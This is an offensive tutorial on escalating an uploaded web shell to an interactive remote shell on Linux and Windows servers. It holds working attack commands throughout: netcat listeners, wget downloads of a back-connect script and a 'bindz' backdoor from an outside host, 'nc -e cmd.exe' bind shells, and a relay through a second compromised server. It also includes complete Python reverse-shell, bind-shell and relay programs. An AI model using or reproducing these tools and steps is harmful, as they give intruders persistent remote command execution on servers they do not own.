You have probably seen someone get a command shell on a web server after uploading a web shell (a "ShellScript": a PHP or Perl page that runs commands) to it.
This article covers several methods of turning such an uploaded script into a proper interactive shell. Which one applies depends on two things: whether your own box has a valid (publicly routable) IP address, and whether the target server sits behind a firewall.
Scenario 1 :
Scenario : We have a Linux server, and our own box has a valid (publicly routable) IP address. In this case we get a reverse shell: the server connects out to our box. Because most firewalls allow outbound connections while blocking unsolicited inbound ones, a connect-back gets past the server's firewall without any further trickery.
First we open a listening port on our local machine; the syntax is shown below:
for windows :
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
d:\Documents and Settings\Sc0rpion\Desktop>nc -lvp 2121
listening on [any] 2121 …
Note : "-l" puts netcat into listening mode, "-p" selects the port number, and "-v" enables verbose output.
for linux :
$./nc -vlp 2121
Now we need a "back connect" script on the server; we'll use dc.pl here. Upload it the same way you uploaded the web shell, or fetch it from the server itself with wget, lwp-download or curl. With wget, for example:
cd /var/tmp;wget http://sc0rpion.by.ru/dc.pl
–06:33:16– http://sc0rpion.by.ru/dc.pl
=> `dc.pl’
Resolving sc0rpion.by.ru… 217.16.29.51
Connecting to sc0rpion.by.ru|217.16.29.51|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2.0 (2K) [text/plain]
0K ………. …….. 100% 70.86 KB/s
06:33:17 (70.86 KB/s) - `dc.pl’ saved [2/2]
Note : Whether wget, curl or lwp-download works depends on which of them is installed and on whether the host's iptables rules (or upstream egress filtering) allow outbound HTTP from the server.
Then run the Perl script with this syntax:
$ perl dc.pl yourValidIP port
If everything goes well, the shell appears in the netcat window we opened before.
Scenario 2 :
This scenario is like the previous one, except that the target is a Windows NT server; your own box again has a valid IP address. We use a connect-back to get past the firewall, just as before.
First we open a listening port on our local machine; the syntax is shown here:
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>nc -vlp 2121
listening on [any] 2121 ...
Now use a script or program that connects back. I use "TRKShell.exe"; upload it with its required files to the target:
7,680 TRK.exe
66 RSRC.RC
The program is tiny, so it is easy to transfer. Once the files are on the target, run it with this command:
TRK -c 217.218.228.144 2121
Here 217.218.228.144 is my valid IP and 2121 is the port netcat is listening on. If everything works, you now have control of the system, like this:
connect to [*****] from localhost [*****] 2934
..:: Hax0rcitos Win32ASM Remote Shell v0.1 by Tarako@3wdesign.es ::..
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\.......................................... >
Scenario 3 :
Scenario 3 differs from the previous two: the target is a Linux or Windows NT server and our own box has an invalid (private or NATed) IP address, so the server cannot connect back to us. The server has no firewall, however, so we can open a listening port on it with a "binder" (a bind shell) and connect to that instead.
For Windows NT servers use netcat:
nc -lp 6669 -dte cmd.exe
("-l" listen, "-p" port, "-d" detach from the console, "-t" answer telnet negotiation, "-e" attach cmd.exe to the connection) and then telnet to the server on port 6669.
For Linux servers :
There are many binders and you can choose any of them (that is your job!); I only describe the method.
Start !
First upload your binder. I use this one, "bindz"; follow the box:
cd /var/tmp;wget http://sc0rpion.by.ru/Toolz/bindz
--06:33:16-- http://sc0rpion.by.ru/Toolz/bindz
=> `bindz'
Resolving sc0rpion.by.ru... 217.16.29.51
Connecting to sc0rpion.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,429 (19K) [text/plain]
0K .......... ........ 100% 70.86 KB/s
06:33:17 (70.86 KB/s) - `bindz' saved [19429/19429]
Whenever you transfer a file to a Linux server you must set its permissions before you can execute it (search Google for more about permissions). Use /var/tmp or /tmp, because those directories are world-writable (mode 1777) on practically every system.
See the output:
cd /var/tmp;ls -la
drwxrwxrwt 4 root root 610304 Feb 18 06:40 .
drwxr-xr-x 27 root root 4096 Jan 29 04:07 ..
-rw-r--r-- 1 teambaby teambaby 19429 Jan 21 14:48 bindz
cd /var/tmp;chmod 777 bindz
< -------------------or------------------- >
cd /var/tmp;chmod +x bindz
cd /var/tmp;ls -la bindz
(chmod +x is all that is needed; 777 additionally makes the file world-writable, so any other user on the box could replace your binder.)
Why did we do this? Because we had no permission to execute the file; now we can run it to bind a port on the remote machine. Follow me:
-rwxrwxrwx 1 teambaby teambaby 19429 Jan 21 14:48 bindz
And :
cd /var/tmp;./bindz
See out put :
Innconect Boys backdoor =]
Binding the 9865
OK, pid 30062
Port 9865 was bound successfully and the PID is 30062 (later you can remove the backdoor with "kill -9 30062").
Finally, connect with netcat:
$ nc www.site.com 9865
sh-2.05b$uname
linux
sh-2.05b$
Oh we got it ;)
Perl binders work the same way as described in this scenario, with one small change: you run the binder with the Perl interpreter, like this:
perl bindlin.pl
That's it, nothing else! End of Part 3.
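As an added example (not the page's dc.pl or bindz, which are not reproduced here), the following Python script implements both kinds of shell discussed so far: the back-connect of Scenario 1 (and of Scenario 2, since subprocess uses cmd.exe on Windows) and the bound port of Scenario 3, together with the attacker-side listener and client that netcat provides in the text. Host names, ports and the "sh$ " prompt marker are assumptions chosen for illustration.

```python
# Added example: Python stand-ins for the page's dc.pl (back-connect, Scenario 1)
# and bindz (bound port, Scenario 3), plus the attacker side that nc plays in
# the text. Hosts, ports and the PROMPT marker are assumptions for illustration.
import socket
import subprocess
from concurrent.futures import ThreadPoolExecutor

PROMPT = b"sh$ "                 # assumed: the only framing between commands
_POOL = ThreadPoolExecutor(max_workers=4)


def serve_shell(conn):
    """Target side, shared by both shells: read one command per line, run it
    with the platform shell (/bin/sh here, cmd.exe on Windows, which is why
    Scenario 2 needs nothing different), send stdout+stderr back, then a
    prompt. Returns how many commands ran; 'exit' or a hang-up ends it."""
    executed, buf = 0, b""
    with conn:
        conn.sendall(PROMPT)
        while True:
            chunk = conn.recv(4096)
            if not chunk:                       # attacker hung up
                return executed
            buf += chunk
            while b"\n" in buf:
                line, buf = buf.split(b"\n", 1)
                cmd = line.decode(errors="replace").strip()
                if cmd == "exit":
                    return executed
                if cmd:
                    r = subprocess.run(cmd, shell=True, capture_output=True)
                    conn.sendall(r.stdout + r.stderr)
                    executed += 1
                conn.sendall(PROMPT)


def reverse_shell(host, port):
    """Scenario 1: the target dials OUT to the attacker's listener, so only
    outbound traffic must be allowed through the target's firewall."""
    with socket.create_connection((host, port)) as s:
        return serve_shell(s)


def open_listener(port, host="0.0.0.0"):
    """Bind + listen on host:port (port 0 = let the OS choose a free port)."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind((host, port))
    ls.listen(1)
    return ls


def bind_shell(listener):
    """Scenario 3: the target listens and serves the first client; an INBOUND
    port must therefore be reachable, which a firewall usually prevents."""
    conn, _ = listener.accept()
    listener.close()
    return serve_shell(conn)


# ---- attacker side: what 'nc -lvp 2121' and 'nc www.site.com 9865' do ----
def _read_until_prompt(conn):
    buf = b""
    while not buf.endswith(PROMPT):
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("shell closed")
        buf += chunk
    return buf[:-len(PROMPT)]


def catch_shell(listener):
    """Wait for the target's back-connect (Scenario 1) and return the socket."""
    conn, _ = listener.accept()
    listener.close()
    _read_until_prompt(conn)                    # swallow the first prompt
    return conn


def connect_shell(host, port):
    """Connect to a port the target bound (Scenario 3) and return the socket."""
    conn = socket.create_connection((host, port))
    _read_until_prompt(conn)
    return conn


def send_command(conn, cmd):
    """Send one command line; return its output (bytes up to the next prompt)."""
    conn.sendall(cmd.encode() + b"\n")
    return _read_until_prompt(conn)


def close_shell(conn):
    """Tell the target to stop serving, then drop the connection."""
    conn.sendall(b"exit\n")
    conn.close()


def spawn(fn, *args):
    """Run fn in a background thread and return a Future with its result."""
    return _POOL.submit(fn, *args)
```

Both sides speak raw TCP, exactly as with netcat, so the target half can just as well be driven from a plain `nc -lvp` window and the attacker half can talk to a real bound port. The prompt marker is the only framing: output that itself ends in "sh$ " would be cut short, the same ambiguity a netcat operator lives with. Note that this is a request/response command shell, not a pty, so interactive programs such as vi or su will not behave.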
Scenario 4 :
In this scenario the target has a firewall and your own box has an invalid IP address, so neither of the earlier methods works:
1. Connect back (server to your box): the server cannot reach your private address.
2. Binding a port (on the server): the firewall blocks the inbound connection.
This method is quite different from the others: we pass the shell between two remote machines. First you need a server with a valid IP address, which we call server "A". The server you want a shell from is server "B".
First get a remote shell on server "A" by binding a port (as in Scenario 3). Then upload dc.pl (or your own connect-back script) to server "B", upload nc to server "A", and on "A" run:
$ chmod +x nc
$ ./nc -lvvp [port]
On server "B" run the Perl script with this syntax:
bash# perl dc.pl [server "A" IP] [port]
If everything goes well, the shell from server "B" appears in the netcat window we opened on server "A". You see, the shell was passed easily between two servers (Linux to Linux). Note that this still requires server "B"'s firewall to allow outbound connections to the chosen port on "A"; if egress is filtered too, pick a port that is allowed out, such as 80 or 443.
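As an added example (not a tool from the page), here is the server "A" side of this rendezvous in Python. Rather than sitting inside a bound shell on "A" and starting netcat there, "A" listens on two ports, one for the attacker and one for server "B"'s back-connect, and splices the two connections once both have arrived. Server "B" needs nothing special: any back-connect that dials "A", such as dc.pl from Scenario 1, will do. Hosts and ports are assumptions for illustration.

```python
# Added example: the server-A rendezvous of Scenario 4 in Python (not a tool
# from the page). A owns a public address, so the attacker connects to one
# port and server B back-connects to another; A splices the two streams.
# Hosts and ports are assumptions for illustration.
import select
import socket
from concurrent.futures import ThreadPoolExecutor

_POOL = ThreadPoolExecutor(max_workers=2)


def start_relay(attacker_port=0, callback_port=0, host="0.0.0.0"):
    """Bind both ports now (so the caller learns them even when 0 was asked
    for) and run the splice in the background. Returns
    (attacker_port, callback_port, future); the future yields the byte
    counts (attacker->B, B->attacker) once either side disconnects."""
    listeners = []
    for port in (attacker_port, callback_port):
        ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        ls.bind((host, port))
        ls.listen(1)
        listeners.append(ls)
    ports = tuple(ls.getsockname()[1] for ls in listeners)
    return ports[0], ports[1], _POOL.submit(_relay, *listeners)


def _relay(listen_attacker, listen_callback):
    # Accept in whichever order the parties arrive: the attacker usually sits
    # on A first, but B's back-connect may call in before the attacker attaches.
    conns = {}
    while len(conns) < 2:
        pending = [ls for ls in (listen_attacker, listen_callback) if ls not in conns]
        ready, _, _ = select.select(pending, [], [])
        for ls in ready:
            conns[ls] = ls.accept()[0]
    listen_attacker.close()
    listen_callback.close()
    attacker, target = conns[listen_attacker], conns[listen_callback]
    peer = {attacker: target, target: attacker}
    seen = {attacker: 0, target: 0}             # bytes received FROM each side
    try:
        while True:
            ready, _, _ = select.select([attacker, target], [], [])
            for s in ready:
                data = s.recv(4096)
                if not data:                    # one side closed: tear down both
                    return seen[attacker], seen[target]
                peer[s].sendall(data)
                seen[s] += len(data)
    finally:
        attacker.close()
        target.close()


def connect_to(host, port):
    """Plain TCP client: the attacker's 'nc A port' and B's back-connect."""
    return socket.create_connection((host, port))


if __name__ == "__main__":
    import sys
    a, b, fut = start_relay(int(sys.argv[1]), int(sys.argv[2]))
    print(f"attacker port {a}, callback port {b}")
    print("relayed (attacker->B, B->attacker):", fut.result())
```

Run on "A" as `python3 relay.py 2121 2122`, then `nc A 2121` from your box and `perl dc.pl A 2122` on "B"; everything you type on the attacker socket reaches "B"'s shell and its output comes back. Because the relay only needs two inbound ports on "A", the attacker's own address is never involved, which is exactly what an invalid IP requires.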
THE END.
You can download this journal in two languages: